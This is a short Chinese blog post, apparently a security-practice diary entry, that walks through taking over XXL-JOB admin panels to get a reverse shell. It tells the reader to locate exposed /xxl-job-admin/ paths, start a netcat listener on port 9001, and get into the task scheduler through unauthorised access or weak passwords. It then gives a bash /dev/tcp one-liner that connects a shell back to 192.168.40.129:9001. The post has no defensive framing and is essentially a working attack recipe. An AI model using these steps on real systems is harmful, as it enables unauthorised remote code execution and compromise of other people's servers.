Cyber Security-Day24(实战之反弹Shell漏洞原理及方法)

1.首先锁定漏洞,在我们通过指纹或者一些特征我们可以获得一些敏感资产:

 2.我们在当前url后边加+/xxl-job-admin/

3.使用我们监听服务器去监听指定端口:比如9001

nc -lvnp 9001

4.通过未授权或者弱口令进入到任务后台在任务调度里边:

输入反弹服务器shell的命令:

0<&196;exec 196<>/dev/tcp/192.168.40.129/9001; sh <&196 >&196 2>&196

监听到服务上线,成功getshell;

 

本文作者:Arrest

本文链接:https://www.cnblogs.com/arrest/articles/16617544.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   Arrest  阅读(41)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起